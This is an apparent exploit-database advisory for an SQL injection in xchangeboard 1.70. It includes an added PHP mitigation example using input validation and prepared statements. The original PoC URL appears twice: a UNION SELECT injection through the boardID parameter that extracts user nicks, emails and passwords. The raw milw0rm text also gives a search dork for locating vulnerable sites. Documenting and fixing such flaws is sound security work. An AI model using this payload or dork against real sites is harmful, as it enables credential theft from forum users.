Vendor: xchangeboard
By: haZl0oh
CVSS: 7.5 (HIGH)
Credentials saved as cookies
CWE: 89
Product Name: xchangeboard
Affected Version From: 1.7
Affected Version To: 1.7
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

xchangeboard 1.70 final and lower

xchangeboard 1.70 final and lower is vulnerable to SQL injection through the boardID parameter of newThread.php. An attacker can exploit this vulnerability to gain access to user credentials such as passwords, which are also saved as cookies. The PoC for this exploit is:
http://site.com/path/newThread.php?boardID=+999999%20union%20select%20email,concat_ws(0x3a,nick,substring(password,1,100)),email,email,email%20from%20user/*

Mitigation:

Ensure that user input is properly sanitized and validated before being used in an SQL query.
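
Added example (not xchangeboard's code and not part of the original advisory): one way to apply this mitigation to the boardID parameter in PHP 8, validating it as a positive integer and binding it in a prepared statement. The function names, the board table and its columns are assumptions, and an in-memory SQLite database with constructed rows stands in for the application's database.

```php
<?php
declare(strict_types=1);

// Added illustration, not xchangeboard code. The `board` table and its
// columns are assumptions; SQLite in memory stands in for the real database.

/** Accept boardID only as a positive decimal integer string (1-9 digits). */
function parseBoardId(mixed $raw): ?int
{
    // Non-strings (missing parameter, boardID[]=1 arrays) are rejected outright.
    if (!is_string($raw) || preg_match('/\A[1-9][0-9]{0,8}\z/', $raw) !== 1) {
        return null;
    }
    return (int) $raw;
}

/** Look up a board with a bound integer parameter instead of string concatenation. */
function findBoard(PDO $db, int $boardId): ?array
{
    $stmt = $db->prepare('SELECT id, title FROM board WHERE id = :id');
    $stmt->bindValue(':id', $boardId, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed sample data.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE board (id INTEGER PRIMARY KEY, title TEXT)');
$db->exec("INSERT INTO board (id, title) VALUES (1, 'General')");

// Constructed inputs (in a handler: $_GET['boardID'] ?? null).
// The last one is the boardID value from the PoC after URL decoding.
$inputs = [
    '1',
    '999999',
    '7abc',
    ' 999999 union select email,concat_ws(0x3a,nick,substring(password,1,100)),email,email,email from user/*',
];

foreach ($inputs as $raw) {
    $id = parseBoardId($raw);
    if ($id === null) {
        echo "rejected (HTTP 400): " . json_encode($raw) . PHP_EOL;
        continue;
    }
    $board = findBoard($db, $id);
    echo "boardID $id: " . ($board === null ? 'no such board' : $board['title']) . PHP_EOL;
}
```

With MySQL, also set PDO::ATTR_EMULATE_PREPARES to false so the statement is prepared on the server rather than interpolated by the client library.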

Exploit-DB raw data:

######################
 #
 # xchangeboard 1.70 final and lower
 #
 #
 ######################
 #
 #Bug by: haZl0oh #
 #Dork: "Powered by xchangeboard"
 #info: you have to be a registered user to use it like this !!!!
 #there should be a lot more vulns there ;)
 #
 #
 #
 # credentials like passwords are saved as cookies .... :D
 ##
 ###
 ##
 #
 #PoC:
 #http://site.com/path/newThread.php?boardID=+999999%20union%20select%20email,concat_ws(0x3a,nick,substring(password,1,100)),email,email,email%20from%20user/*
 #
 # #
 #
 #
 #######################
 #
 #Greetz to h0yt3r ,everiZzel & Mastermaefju
 #
 #######################
#######################

# milw0rm.com [2008-07-02]